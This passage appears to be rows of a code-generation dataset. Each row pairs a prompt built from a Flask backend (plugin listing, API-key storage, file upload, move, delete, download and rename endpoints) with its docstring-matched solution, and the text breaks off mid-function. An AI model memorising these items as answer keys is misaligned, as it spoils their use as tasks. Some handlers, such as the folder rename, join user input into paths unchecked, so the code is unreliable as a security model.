id
int64 0
190k
| prompt
stringlengths 21
13.4M
| docstring
stringlengths 1
12k
⌀ |
---|---|---|
188,431 | from flask import request, jsonify, Response
from backend.api.chat_plugin import plugins
from backend.main import app, api_key_pool
from backend.schemas import DEFAULT_USER_ID
global plugins
plugins = []
# Load icon image
# If image is base64 encoded
plugins.append(
{
"id": plugin_type,
"name": plugin_type,
"name_for_human": plugin_info["meta_info"]["manifest"]["name_for_human"],
"description": plugin_info["description"],
"icon": encoded_image,
"require_api_key": plugin_info["need_auth"],
}
)
api_key_pool: UserMemoryManager = UserMemoryManager(name="api_key_pool", backend=API_KEY_MEMORY_MANAGER_BACKEND)
DEFAULT_USER_ID = "DefaultUser"
The provided code snippet includes necessary dependencies for implementing the `get_tool_list` function. Write a Python function `def get_tool_list() -> Response` to solve the following problem:
parameters: { user_id: id of the user } return value: [{ id: id of a plugin, name: name of a plugin, description: description of the plugin, icon: icon of the plugin, require_api_key: whether the plugin requires api_key, api_key: the api key of the plugin, None if no api key }]
Here is the function:
def get_tool_list() -> Response:
"""parameters:
{
user_id: id of the user
}
return value:
[{
id: id of a plugin,
name: name of a plugin,
description: description of the plugin,
icon: icon of the plugin,
require_api_key: whether the plugin requires api_key,
api_key: the api key of the plugin, None if no api key
}]
"""
user_id = DEFAULT_USER_ID
api_key_info = api_key_pool.get_pool_info_with_id(user_id, [])
tool_list = []
for plugin in plugins:
plugin_info = {
"id": plugin["id"],
"name": plugin["name"],
"name_for_human": plugin["name_for_human"],
"description": plugin["description"],
"icon": plugin["icon"],
"require_api_key": plugin["require_api_key"],
}
search_plugin = [i for i in api_key_info if i["tool_id"] == plugin["id"]]
if len(search_plugin) > 0:
plugin_info["api_key"] = search_plugin[0]["api_key"]
else:
plugin_info["api_key"] = None
tool_list.append(plugin_info)
return jsonify(tool_list) | parameters: { user_id: id of the user } return value: [{ id: id of a plugin, name: name of a plugin, description: description of the plugin, icon: icon of the plugin, require_api_key: whether the plugin requires api_key, api_key: the api key of the plugin, None if no api key }] |
188,432 | from flask import request, jsonify, Response
from backend.api.chat_plugin import plugins
from backend.main import app, api_key_pool
from backend.schemas import DEFAULT_USER_ID
api_key_pool: UserMemoryManager = UserMemoryManager(name="api_key_pool", backend=API_KEY_MEMORY_MANAGER_BACKEND)
DEFAULT_USER_ID = "DefaultUser"
The provided code snippet includes necessary dependencies for implementing the `post_tool_api_key` function. Write a Python function `def post_tool_api_key() -> Response` to solve the following problem:
parameters: { user_id: id of the user, tool_id: id of the tool, tool_name: name of the tool, api_key: api_key of the tool }
Here is the function:
def post_tool_api_key() -> Response:
"""parameters:
{
user_id: id of the user,
tool_id: id of the tool,
tool_name: name of the tool,
api_key: api_key of the tool
}
"""
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
tool_id = request_json["tool_id"]
tool_name = request_json["tool_name"]
api_key = request_json["api_key"]
api_key_info = api_key_pool.get_pool_info_with_id(user_id, [])
flag = False
for i in api_key_info:
if i["tool_id"] == tool_id:
flag = True
i["api_key"] = api_key
if not flag:
api_key_info.append({"tool_id": tool_id, "tool_name": tool_name, "api_key": api_key})
api_key_pool.set_pool_info_with_id(user_id, api_key_info)
return Response("Success", status=200) | parameters: { user_id: id of the user, tool_id: id of the tool, tool_name: name of the tool, api_key: api_key of the tool } |
188,433 | import os
from backend.app import app
from real_agents.adapters.models import ChatOpenAI, ChatAnthropic, AzureChatOpenAI
from real_agents.adapters.llm import BaseLanguageModel
The provided code snippet includes necessary dependencies for implementing the `get_llm_list` function. Write a Python function `def get_llm_list()` to solve the following problem:
Gets the whole llm list.
Here is the function:
def get_llm_list():
"""Gets the whole llm list."""
return [
{"id": llm, "name": llm} for llm in [
"gpt-3.5-turbo-16k",
"gpt-4",
"claude-v1",
"claude-2",
"lemur-chat"
]
] | Gets the whole llm list. |
188,434 | import json
import os
import shutil
from typing import Dict, Any
from flask import Response, jsonify, request, send_file
from backend.app import app
from backend.main import (
grounding_source_pool,
logger,
message_id_register,
message_pool,
)
from backend.schemas import DEFAULT_USER_ID
from backend.utils.utils import create_personal_folder
from backend.utils.user_conversation_storage import get_user_conversation_storage
from backend.utils.utils import (
allowed_file,
get_data_model_cls,
get_user_and_chat_id_from_request,
get_user_and_chat_id_from_request_json,
is_sqlite_file,
is_table_file,
is_image_file,
load_grounding_source,
)
from backend.schemas import INTERNAL, UNFOUND
def secure_filename(filename: str) -> str:
keep_characters = ('.', '_')
filename = "".join(
c for c in filename if c.isalnum() or c in keep_characters).rstrip()
return filename
logger = init_log(
error=os.path.join(".logging", "error.log"),
runtime=os.path.join(".logging", "runtime.log"),
serialize=os.path.join(".logging", "serialize.log"),
trace=os.path.join(".logging", "trace.log"),
)
def get_user_and_chat_id_from_request(request: Request) -> Tuple[str, str]:
user_id = request.form.get("user_id", DEFAULT_USER_ID)
chat_id = request.form.get("chat_id")
return user_id, chat_id
def allowed_file(filename: Union[str, Path]) -> bool:
if isinstance(filename, str):
filename = Path(filename)
suffix = filename.suffix[1:]
if suffix in ALLOW_EXTENSIONS:
return True
else:
return False
def create_personal_folder(user_id: str) -> str:
# mkdir user folder
from backend.main import app
user_folder = os.path.join(app.config["UPLOAD_FOLDER"], user_id)
os.makedirs(user_folder, exist_ok=True)
# mkdir chat folder under user folder
return user_folder
INTERNAL = 500
The provided code snippet includes necessary dependencies for implementing the `create_upload_file` function. Write a Python function `def create_upload_file() -> dict | Response` to solve the following problem:
Uploads a new file.
Here is the function:
def create_upload_file() -> dict | Response:
"""Uploads a new file."""
try:
if "file" not in request.files:
return {"error": "No file part in the request"}
file = request.files["file"]
(user_id, chat_id) = get_user_and_chat_id_from_request(request)
folder = create_personal_folder(user_id)
# Check if the file is allowed
if not allowed_file(str(file.filename)):
return {"error": "File type not allowed"}
# Save and read the file
file.filename = secure_filename(str(file.filename))
file_path = os.path.join(folder, file.filename)
file.save(file_path)
response = {"success": file.filename}
logger.bind(user_id=user_id, chat_id=chat_id, api="/upload",
msg_head="Upload file success").debug(file_path)
return jsonify(response)
except Exception as e:
logger.bind(user_id=user_id, chat_id=chat_id, api="/upload",
msg_head="Upload file error").error(str(e))
return Response(response=None, status=f"{INTERNAL} Upload File Error: {str(e)}") | Uploads a new file. |
188,435 | import json
import os
import shutil
from typing import Dict, Any
from flask import Response, jsonify, request, send_file
from backend.app import app
from backend.main import (
grounding_source_pool,
logger,
message_id_register,
message_pool,
)
from backend.schemas import DEFAULT_USER_ID
from backend.utils.utils import create_personal_folder
from backend.utils.user_conversation_storage import get_user_conversation_storage
from backend.utils.utils import (
allowed_file,
get_data_model_cls,
get_user_and_chat_id_from_request,
get_user_and_chat_id_from_request_json,
is_sqlite_file,
is_table_file,
is_image_file,
load_grounding_source,
)
from backend.schemas import INTERNAL, UNFOUND
def _generate_human_side_data_from_file(filename: str, data_model: Any) -> Dict:
if is_table_file(filename):
# Determine the format of the human side(frontend) table
human_side_data = data_model.get_human_side_data(mode="FULL")
if TABLE_HUMAN_SIDE_FORMAT == "markdown":
human_side_data = human_side_data.to_markdown(index=False)
human_side_data_type = "plain"
elif TABLE_HUMAN_SIDE_FORMAT == "material-react-table":
columns = list(map(lambda item: {"accessorKey": item, "header": item},
human_side_data.columns.tolist()))
data = human_side_data.fillna("").to_dict(orient="records")
human_side_data = json.dumps({"columns": columns, "data": data})
human_side_data_type = "table"
data = {"success": filename, "content": human_side_data,
"type": human_side_data_type}
elif is_sqlite_file(filename):
data = {"success": filename, "content": filename, "type": "table"}
elif is_image_file(filename):
# Determine the format of human side(frontend) image
human_side_data = data_model.get_human_side_data()
data = {"success": filename, "content": human_side_data, "type": "image"}
else:
return {"error": "Document file type not supported"}
return data
def _get_file_path_from_node(folder: str, file_node: dict) -> Any:
path_tree_list: list = []
id_to_path_dict = {0: folder}
_path_tree_for_react_dnd_treeview(path_tree_list, id_to_path_dict, folder, 0)
path = id_to_path_dict[file_node["id"]]
return path
logger = init_log(
error=os.path.join(".logging", "error.log"),
runtime=os.path.join(".logging", "runtime.log"),
serialize=os.path.join(".logging", "serialize.log"),
trace=os.path.join(".logging", "trace.log"),
)
message_pool: MessageMemoryManager = MessageMemoryManager(name="message_pool", backend=MESSAGE_MEMORY_MANAGER_BACKEND)
grounding_source_pool: ChatMemoryManager = ChatMemoryManager()
message_id_register = VariableRegister(name="message_id_register", backend=VARIABLE_REGISTER_BACKEND)
def get_user_and_chat_id_from_request_json(request_json: Dict) -> Tuple[str, str]:
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
return user_id, chat_id
def load_grounding_source(file_path: str) -> Any:
# TODO: Maybe convert to DataModel here
suffix = Path(file_path).suffix
if Path(file_path).is_dir():
# Assume it is a collection of csv files, usually downloaded from kaggle.
grounding_source = {}
for file in Path(file_path).iterdir():
if file.suffix == ".csv":
grounding_source[file.as_posix()] = pd.read_csv(file, index_col=False)
else:
raise ValueError("Only csv files are allowed in the directory")
elif suffix == ".csv":
grounding_source = pd.read_csv(file_path, index_col=False)
elif suffix == ".tsv" or suffix == ".txt":
grounding_source = pd.read_csv(file_path, sep="\t")
elif suffix == ".xlsx" or suffix == ".xls":
grounding_source = pd.read_excel(file_path)
elif suffix == ".db" or suffix == ".sqlite":
engine = create_engine(f"sqlite:///{file_path}")
grounding_source = SQLDatabase(engine)
return grounding_source
elif suffix == ".png" or suffix == ".jpg" or suffix == ".jpeg":
img = Image.open(file_path)
with open(file_path, "rb") as image2string:
converted_string = "data:image/png;base64," + base64.b64encode(image2string.read()).decode("utf-8")
grounding_source = {
"base64_string": converted_string,
"format": img.format,
"size": img.size,
"mode": img.mode,
}
else:
raise ValueError("File type not allowed to be set as grounding source")
return grounding_source
def get_data_model_cls(file_path: str) -> DataModel:
suffix = Path(file_path).suffix
if Path(file_path).is_dir():
data_model_cls = KaggleDataModel
elif suffix == ".csv":
data_model_cls = TableDataModel
elif suffix == ".tsv" or suffix == ".txt":
raise NotImplementedError("Not implemented yet")
elif suffix == ".xlsx" or suffix == ".xls":
data_model_cls = TableDataModel
elif suffix == ".sqlite" or suffix == ".db":
data_model_cls = DatabaseDataModel
elif suffix == ".jpeg" or suffix == ".png" or suffix == ".jpg":
data_model_cls = ImageDataModel
else:
raise ValueError("File type not allowed to be set as grounding source")
return data_model_cls
def create_personal_folder(user_id: str) -> str:
# mkdir user folder
from backend.main import app
user_folder = os.path.join(app.config["UPLOAD_FOLDER"], user_id)
os.makedirs(user_folder, exist_ok=True)
# mkdir chat folder under user folder
return user_folder
def get_user_conversation_storage():
"""Connects to mongodb."""
if "user_conversation_storage" not in g:
g.user_conversation_storage = pymongo.MongoClient("mongodb://{0}:27017/".format(os.getenv("MONGO_SERVER")))
return g.user_conversation_storage["xlang"]
INTERNAL = 500
The provided code snippet includes necessary dependencies for implementing the `apply_to_conversation` function. Write a Python function `def apply_to_conversation() -> Response` to solve the following problem:
Applies data to the conversation.
Here is the function:
def apply_to_conversation() -> Response:
"""Applies data to the conversation."""
try:
request_json = request.get_json()
(user_id, chat_id) = get_user_and_chat_id_from_request_json(request_json)
file_node = request_json["activated_file"]
parent_message_id = request_json["parent_message_id"]
folder = create_personal_folder(user_id)
# Modify the selected grounding sources
grounding_source_dict = grounding_source_pool.get_pool_info_with_id(user_id,
chat_id,
default_value={})
file_path = _get_file_path_from_node(folder, file_node)
filename = file_node["text"]
filename_no_ext = os.path.splitext(filename)[0]
if file_path not in grounding_source_dict:
data = load_grounding_source(file_path)
data_model = get_data_model_cls(filename).from_raw_data(
raw_data=data,
raw_data_name=filename_no_ext,
raw_data_path=file_path,
)
grounding_source_dict[file_path] = data_model
# Add uploaded file in chat memory
message_list = message_pool.get_pool_info_with_id(user_id, chat_id,
default_value=list())
llm_side_data = data_model.get_llm_side_data()
human_message_content = "[User uploaded a file {}]\n{}".format(filename,
llm_side_data)
human_message_id = message_id_register.add_variable(human_message_content)
message_list.append(
{
"message_id": human_message_id,
"parent_message_id": parent_message_id,
"message_type": "human_message",
"message_content": human_message_content,
}
)
data = _generate_human_side_data_from_file(filename, data_model)
message_pool.set_pool_info_with_id(user_id, chat_id, message_list)
grounding_source_pool.set_pool_info_with_id(user_id, chat_id,
grounding_source_dict)
# Dump to database
db = get_user_conversation_storage()
db_message = {
"conversation_id": chat_id,
"user_id": user_id,
"message_id": human_message_id,
"parent_message_id": parent_message_id,
"version_id": 0,
"role": "user",
"data_for_human": {
"intermediate_steps": [],
"final_answer": [
{
"type": data["type"],
"text": data["content"],
"final": True,
}
],
},
"data_for_llm": message_list[-1]["message_content"],
"raw_data": None,
}
db.message.insert_one(db_message)
response = {
"success": True,
"message_id": human_message_id,
"parent_message_id": parent_message_id,
"message": "Successfully apply {} to conversation {}".format(filename,
chat_id),
"content": {
"intermediate_steps": [],
"final_answer": [
{
"type": data["type"],
"text": data["content"],
"final": True,
}
],
},
}
logger.bind(user_id=user_id, chat_id=chat_id, api="/apply",
msg_head="Apply file success").debug(file_path)
del db_message["data_for_human"]
return jsonify(response)
else:
logger.bind(user_id=user_id, chat_id=chat_id, api="/apply",
msg_head="Apply file failed").debug(file_path)
return jsonify({"success": False,
"message": "You have already import {} to the conversation".format(
filename)})
except Exception as e:
logger.bind(user_id=user_id, chat_id=chat_id, api="/apply",
msg_head="Apply file failed").error(file_path)
import traceback
traceback.print_exc()
return Response(response=None,
status=f"{INTERNAL} Fail to apply file to chat: {str(e)}") | Applies data to the conversation. |
188,436 | import json
import os
import shutil
from typing import Dict, Any
from flask import Response, jsonify, request, send_file
from backend.app import app
from backend.main import (
grounding_source_pool,
logger,
message_id_register,
message_pool,
)
from backend.schemas import DEFAULT_USER_ID
from backend.utils.utils import create_personal_folder
from backend.utils.user_conversation_storage import get_user_conversation_storage
from backend.utils.utils import (
allowed_file,
get_data_model_cls,
get_user_and_chat_id_from_request,
get_user_and_chat_id_from_request_json,
is_sqlite_file,
is_table_file,
is_image_file,
load_grounding_source,
)
from backend.schemas import INTERNAL, UNFOUND
def _path_tree_for_react_dnd_treeview(tree: list, id_to_path_dict: dict, path: str,
parent: int,
highlighted_files: list = []) -> list:
"""
{
"id": 1,
"parent": 0,
"droppable": true,
"text": "Folder 1"
},
{
"id": 2,
"parent": 1,
"text": "File 1-1",
"data": {
"fileType": "csv",
"fileSize": "0.5MB"
}
},
"""
for item in os.listdir(path):
if item.startswith("."):
continue
item_path = os.path.join(path, item)
droppable = os.path.isdir(item_path)
idx = len(tree) + 1
tree.append({
"id": idx,
"parent": parent,
"droppable": droppable,
"text": item,
"highlight": True if item_path in highlighted_files else False})
id_to_path_dict[idx] = item_path
if os.path.isdir(item_path):
_path_tree_for_react_dnd_treeview(tree, id_to_path_dict, item_path, idx)
return []
logger = init_log(
error=os.path.join(".logging", "error.log"),
runtime=os.path.join(".logging", "runtime.log"),
serialize=os.path.join(".logging", "serialize.log"),
trace=os.path.join(".logging", "trace.log"),
)
def get_user_and_chat_id_from_request_json(request_json: Dict) -> Tuple[str, str]:
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
return user_id, chat_id
def create_personal_folder(user_id: str) -> str:
# mkdir user folder
from backend.main import app
user_folder = os.path.join(app.config["UPLOAD_FOLDER"], user_id)
os.makedirs(user_folder, exist_ok=True)
# mkdir chat folder under user folder
return user_folder
INTERNAL = 500
The provided code snippet includes necessary dependencies for implementing the `move_files` function. Write a Python function `def move_files() -> Response` to solve the following problem:
Moves file from source path from target source.
Here is the function:
def move_files() -> Response:
"""Moves file from source path from target source."""
request_json = request.get_json()
(user_id, chat_id) = get_user_and_chat_id_from_request_json(request_json)
root_path = create_personal_folder(user_id)
nodes = request_json["nodes"]
try:
if os.path.exists(root_path) and os.path.isdir(root_path):
current_path_tree_list: list = []
id_to_path_dict = {0: root_path}
_path_tree_for_react_dnd_treeview(current_path_tree_list, id_to_path_dict,
root_path, 0)
for node in nodes:
old_path = id_to_path_dict[node["id"]]
new_path = id_to_path_dict[node["parent"]]
shutil.move(old_path, new_path)
logger.bind(user_id=user_id, chat_id=chat_id, api="/move",
msg_head="Move file success").debug(
f"from {old_path} to {new_path}"
)
return jsonify({"success": True, "message": "File moved successfully"})
except Exception as e:
logger.bind(user_id=user_id, chat_id=chat_id, api="/move",
msg_head="Move file failed").error(str(e))
return jsonify({"success": False, "message": str(e)})
return Response(response=None, status=f"{INTERNAL} Fail to move file") | Moves file from source path from target source. |
188,437 | import json
import os
import shutil
from typing import Dict, Any
from flask import Response, jsonify, request, send_file
from backend.app import app
from backend.main import (
grounding_source_pool,
logger,
message_id_register,
message_pool,
)
from backend.schemas import DEFAULT_USER_ID
from backend.utils.utils import create_personal_folder
from backend.utils.user_conversation_storage import get_user_conversation_storage
from backend.utils.utils import (
allowed_file,
get_data_model_cls,
get_user_and_chat_id_from_request,
get_user_and_chat_id_from_request_json,
is_sqlite_file,
is_table_file,
is_image_file,
load_grounding_source,
)
from backend.schemas import INTERNAL, UNFOUND
def _path_tree_for_react_dnd_treeview(tree: list, id_to_path_dict: dict, path: str,
parent: int,
highlighted_files: list = []) -> list:
"""
{
"id": 1,
"parent": 0,
"droppable": true,
"text": "Folder 1"
},
{
"id": 2,
"parent": 1,
"text": "File 1-1",
"data": {
"fileType": "csv",
"fileSize": "0.5MB"
}
},
"""
for item in os.listdir(path):
if item.startswith("."):
continue
item_path = os.path.join(path, item)
droppable = os.path.isdir(item_path)
idx = len(tree) + 1
tree.append({
"id": idx,
"parent": parent,
"droppable": droppable,
"text": item,
"highlight": True if item_path in highlighted_files else False})
id_to_path_dict[idx] = item_path
if os.path.isdir(item_path):
_path_tree_for_react_dnd_treeview(tree, id_to_path_dict, item_path, idx)
return []
logger = init_log(
error=os.path.join(".logging", "error.log"),
runtime=os.path.join(".logging", "runtime.log"),
serialize=os.path.join(".logging", "serialize.log"),
trace=os.path.join(".logging", "trace.log"),
)
def get_user_and_chat_id_from_request_json(request_json: Dict) -> Tuple[str, str]:
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
return user_id, chat_id
def create_personal_folder(user_id: str) -> str:
# mkdir user folder
from backend.main import app
user_folder = os.path.join(app.config["UPLOAD_FOLDER"], user_id)
os.makedirs(user_folder, exist_ok=True)
# mkdir chat folder under user folder
return user_folder
INTERNAL = 500
The provided code snippet includes necessary dependencies for implementing the `delete_files` function. Write a Python function `def delete_files() -> Response` to solve the following problem:
Deletes a file from the filesystem.
Here is the function:
def delete_files() -> Response:
"""Deletes a file from the filesystem."""
request_json = request.get_json()
(user_id, chat_id) = get_user_and_chat_id_from_request_json(request_json)
root_path = create_personal_folder(user_id)
node = request_json["node"]
try:
if os.path.exists(root_path) and os.path.isdir(root_path):
current_path_tree_list: list = []
id_to_path_dict = {0: root_path}
_path_tree_for_react_dnd_treeview(current_path_tree_list, id_to_path_dict,
root_path, 0)
path = id_to_path_dict[node["id"]]
if os.path.isdir(path):
shutil.rmtree(path)
else:
os.remove(path)
logger.bind(user_id=user_id, chat_id=chat_id, api="/delete",
msg_head="Delete file success").debug(path)
return jsonify({"success": True, "message": "File is deleted successfully"})
except Exception as e:
logger.bind(user_id=user_id, chat_id=chat_id, api="/delete",
msg_head="Delete file failed").error(str(e))
return Response(response=None,
status=f"{INTERNAL} Delete file failed: {str(e)}") | Deletes a file from the filesystem. |
188,438 | import json
import os
import shutil
from typing import Dict, Any
from flask import Response, jsonify, request, send_file
from backend.app import app
from backend.main import (
grounding_source_pool,
logger,
message_id_register,
message_pool,
)
from backend.schemas import DEFAULT_USER_ID
from backend.utils.utils import create_personal_folder
from backend.utils.user_conversation_storage import get_user_conversation_storage
from backend.utils.utils import (
allowed_file,
get_data_model_cls,
get_user_and_chat_id_from_request,
get_user_and_chat_id_from_request_json,
is_sqlite_file,
is_table_file,
is_image_file,
load_grounding_source,
)
from backend.schemas import INTERNAL, UNFOUND
def _path_tree_for_react_dnd_treeview(tree: list, id_to_path_dict: dict, path: str,
parent: int,
highlighted_files: list = []) -> list:
"""
{
"id": 1,
"parent": 0,
"droppable": true,
"text": "Folder 1"
},
{
"id": 2,
"parent": 1,
"text": "File 1-1",
"data": {
"fileType": "csv",
"fileSize": "0.5MB"
}
},
"""
for item in os.listdir(path):
if item.startswith("."):
continue
item_path = os.path.join(path, item)
droppable = os.path.isdir(item_path)
idx = len(tree) + 1
tree.append({
"id": idx,
"parent": parent,
"droppable": droppable,
"text": item,
"highlight": True if item_path in highlighted_files else False})
id_to_path_dict[idx] = item_path
if os.path.isdir(item_path):
_path_tree_for_react_dnd_treeview(tree, id_to_path_dict, item_path, idx)
return []
logger = init_log(
error=os.path.join(".logging", "error.log"),
runtime=os.path.join(".logging", "runtime.log"),
serialize=os.path.join(".logging", "serialize.log"),
trace=os.path.join(".logging", "trace.log"),
)
INTERNAL = 500
DEFAULT_USER_ID = "DefaultUser"
def create_personal_folder(user_id: str) -> str:
# mkdir user folder
from backend.main import app
user_folder = os.path.join(app.config["UPLOAD_FOLDER"], user_id)
os.makedirs(user_folder, exist_ok=True)
# mkdir chat folder under user folder
return user_folder
The provided code snippet includes necessary dependencies for implementing the `download_files` function. Write a Python function `def download_files() -> Response` to solve the following problem:
Downloads a file to local.
Here is the function:
def download_files() -> Response:
"""Downloads a file to local."""
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
root_path = create_personal_folder(user_id)
node = request_json["node"]
try:
if os.path.exists(root_path) and os.path.isdir(root_path):
current_path_tree_list: list = []
id_to_path_dict = {0: root_path}
_path_tree_for_react_dnd_treeview(current_path_tree_list, id_to_path_dict,
root_path, 0)
path = id_to_path_dict[node["id"]]
if os.path.exists(path):
logger.bind(user_id=user_id, api="/download",
msg_head="download file success").debug(path)
return send_file(path, as_attachment=True)
logger.bind(user_id=user_id, api="/download",
msg_head="download file failed").debug(path)
return Response(response=None,
status=f"{INTERNAL} Download file failed: file not correctlt sent")
except Exception as e:
print(str(e))
import traceback
traceback.print_exc()
logger.bind(user_id=user_id, api="/download",
msg_head="download file failed").error(str(e))
return Response(response=None,
status=f"{INTERNAL} Download file failed: {str(e)}") | Downloads a file to local. |
188,439 | import json
import os
import shutil
from typing import Dict, Any
from flask import Response, jsonify, request, send_file
from backend.app import app
from backend.main import (
grounding_source_pool,
logger,
message_id_register,
message_pool,
)
from backend.schemas import DEFAULT_USER_ID
from backend.utils.utils import create_personal_folder
from backend.utils.user_conversation_storage import get_user_conversation_storage
from backend.utils.utils import (
allowed_file,
get_data_model_cls,
get_user_and_chat_id_from_request,
get_user_and_chat_id_from_request_json,
is_sqlite_file,
is_table_file,
is_image_file,
load_grounding_source,
)
from backend.schemas import INTERNAL, UNFOUND
def _generate_directory_name(name: str, x:int=0) -> Any:
dir_name = (name + ("_" + str(x) if x != 0 else "")).strip()
if not os.path.exists(dir_name):
return dir_name
else:
return _generate_directory_name(name, x + 1)
logger = init_log(
error=os.path.join(".logging", "error.log"),
runtime=os.path.join(".logging", "runtime.log"),
serialize=os.path.join(".logging", "serialize.log"),
trace=os.path.join(".logging", "trace.log"),
)
def get_user_and_chat_id_from_request_json(request_json: Dict) -> Tuple[str, str]:
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
return user_id, chat_id
def create_personal_folder(user_id: str) -> str:
# mkdir user folder
from backend.main import app
user_folder = os.path.join(app.config["UPLOAD_FOLDER"], user_id)
os.makedirs(user_folder, exist_ok=True)
# mkdir chat folder under user folder
return user_folder
INTERNAL = 500
The provided code snippet includes necessary dependencies for implementing the `create_folders` function. Write a Python function `def create_folders() -> Response` to solve the following problem:
Creates a folder in the filesystem.
Here is the function:
def create_folders() -> Response:
"""Creates a folder in the filesystem."""
request_json = request.get_json()
(user_id, chat_id) = get_user_and_chat_id_from_request_json(request_json)
root_path = create_personal_folder(user_id)
if os.path.exists(root_path) and os.path.isdir(root_path):
try:
new_path = _generate_directory_name(os.path.join(root_path, "Folder"))
os.makedirs(new_path, exist_ok=False)
logger.bind(
user_id=user_id, chat_id=chat_id, api="/create_folder",
msg_head="Create folder success"
).debug(new_path)
return jsonify({"success": True, "message": "Folder created successfully"})
except Exception as e:
logger.bind(user_id=user_id, chat_id=chat_id, api="/create_folder",
msg_head="Create folder failed").error(
str(e)
)
return jsonify({"success": False, "message": str(e)})
else:
logger.bind(user_id=user_id, chat_id=chat_id, api="/create_folder",
msg_head="Create folder failed").error(
"Root path does not exist."
)
return Response(response=None, status=f"{INTERNAL} Root path does not exist") | Creates a folder in the filesystem. |
188,440 | import json
import os
import shutil
from typing import Dict, Any
from flask import Response, jsonify, request, send_file
from backend.app import app
from backend.main import (
grounding_source_pool,
logger,
message_id_register,
message_pool,
)
from backend.schemas import DEFAULT_USER_ID
from backend.utils.utils import create_personal_folder
from backend.utils.user_conversation_storage import get_user_conversation_storage
from backend.utils.utils import (
allowed_file,
get_data_model_cls,
get_user_and_chat_id_from_request,
get_user_and_chat_id_from_request_json,
is_sqlite_file,
is_table_file,
is_image_file,
load_grounding_source,
)
from backend.schemas import INTERNAL, UNFOUND
def _path_tree_for_react_dnd_treeview(tree: list, id_to_path_dict: dict, path: str,
parent: int,
highlighted_files: list = []) -> list:
"""
{
"id": 1,
"parent": 0,
"droppable": true,
"text": "Folder 1"
},
{
"id": 2,
"parent": 1,
"text": "File 1-1",
"data": {
"fileType": "csv",
"fileSize": "0.5MB"
}
},
"""
for item in os.listdir(path):
if item.startswith("."):
continue
item_path = os.path.join(path, item)
droppable = os.path.isdir(item_path)
idx = len(tree) + 1
tree.append({
"id": idx,
"parent": parent,
"droppable": droppable,
"text": item,
"highlight": True if item_path in highlighted_files else False})
id_to_path_dict[idx] = item_path
if os.path.isdir(item_path):
_path_tree_for_react_dnd_treeview(tree, id_to_path_dict, item_path, idx)
return []
logger = init_log(
error=os.path.join(".logging", "error.log"),
runtime=os.path.join(".logging", "runtime.log"),
serialize=os.path.join(".logging", "serialize.log"),
trace=os.path.join(".logging", "trace.log"),
)
def get_user_and_chat_id_from_request_json(request_json: Dict) -> Tuple[str, str]:
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
return user_id, chat_id
def create_personal_folder(user_id: str) -> str:
# mkdir user folder
from backend.main import app
user_folder = os.path.join(app.config["UPLOAD_FOLDER"], user_id)
os.makedirs(user_folder, exist_ok=True)
# mkdir chat folder under user folder
return user_folder
INTERNAL = 500
The provided code snippet includes necessary dependencies for implementing the `rename_folder` function. Write a Python function `def rename_folder() -> Response` to solve the following problem:
Renames a folder in the filesystem.
Here is the function:
def rename_folder() -> Response:
"""Renames a folder in the filesystem."""
request_json = request.get_json()
(user_id, chat_id) = get_user_and_chat_id_from_request_json(request_json)
root_path = create_personal_folder(user_id)
node = request_json["node"]
rename_value = request_json["rename_value"]
if os.path.exists(root_path) and os.path.isdir(root_path):
try:
current_path_tree_list: list = []
id_to_path_dict = {0: root_path}
_path_tree_for_react_dnd_treeview(current_path_tree_list, id_to_path_dict,
root_path, 0)
path = id_to_path_dict[node["id"]]
new_path = os.path.join(os.path.dirname(path), rename_value)
shutil.move(path, new_path)
logger.bind(user_id=user_id, chat_id=chat_id, api="/update",
msg_head="Rename folder success").debug(
f"{path} to {new_path}"
)
return jsonify({"success": True, "message": "Folder created successfully"})
except Exception as e:
logger.bind(user_id=user_id, chat_id=chat_id, api="/update",
msg_head="Rename folder failed").error(str(e))
return jsonify({"success": False, "message": str(e)})
else:
logger.bind(user_id=user_id, chat_id=chat_id, api="/update",
msg_head="Rename folder failed").error(
"Root path does not exist."
)
return Response(response=None, status=f"{INTERNAL} Root path does not exist") | Renames a folder in the filesystem. |
188,441 | import json
import os
import shutil
from typing import Dict, Any
from flask import Response, jsonify, request, send_file
from backend.app import app
from backend.main import (
grounding_source_pool,
logger,
message_id_register,
message_pool,
)
from backend.schemas import DEFAULT_USER_ID
from backend.utils.utils import create_personal_folder
from backend.utils.user_conversation_storage import get_user_conversation_storage
from backend.utils.utils import (
allowed_file,
get_data_model_cls,
get_user_and_chat_id_from_request,
get_user_and_chat_id_from_request_json,
is_sqlite_file,
is_table_file,
is_image_file,
load_grounding_source,
)
from backend.schemas import INTERNAL, UNFOUND
def _path_tree_for_react_dnd_treeview(tree: list, id_to_path_dict: dict, path: str,
parent: int,
highlighted_files: list = []) -> list:
"""
{
"id": 1,
"parent": 0,
"droppable": true,
"text": "Folder 1"
},
{
"id": 2,
"parent": 1,
"text": "File 1-1",
"data": {
"fileType": "csv",
"fileSize": "0.5MB"
}
},
"""
for item in os.listdir(path):
if item.startswith("."):
continue
item_path = os.path.join(path, item)
droppable = os.path.isdir(item_path)
idx = len(tree) + 1
tree.append({
"id": idx,
"parent": parent,
"droppable": droppable,
"text": item,
"highlight": True if item_path in highlighted_files else False})
id_to_path_dict[idx] = item_path
if os.path.isdir(item_path):
_path_tree_for_react_dnd_treeview(tree, id_to_path_dict, item_path, idx)
return []
UNFOUND = 404
INTERNAL = 500
DEFAULT_USER_ID = "DefaultUser"
def create_personal_folder(user_id: str) -> str:
# mkdir user folder
from backend.main import app
user_folder = os.path.join(app.config["UPLOAD_FOLDER"], user_id)
os.makedirs(user_folder, exist_ok=True)
# mkdir chat folder under user folder
return user_folder
The provided code snippet includes necessary dependencies for implementing the `get_path_tree` function. Write a Python function `def get_path_tree() -> Response` to solve the following problem:
Gets a file path tree of one file.
Here is the function:
def get_path_tree() -> Response:
"""Gets a file path tree of one file."""
try:
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
if user_id == "": # front-end may enter empty user_id
return jsonify([])
root_path = create_personal_folder(user_id)
highlighted_files = request_json.get("highlighted_files", [])
if root_path is None:
return {"error": "root_path parameter is required", "error_code": 404}
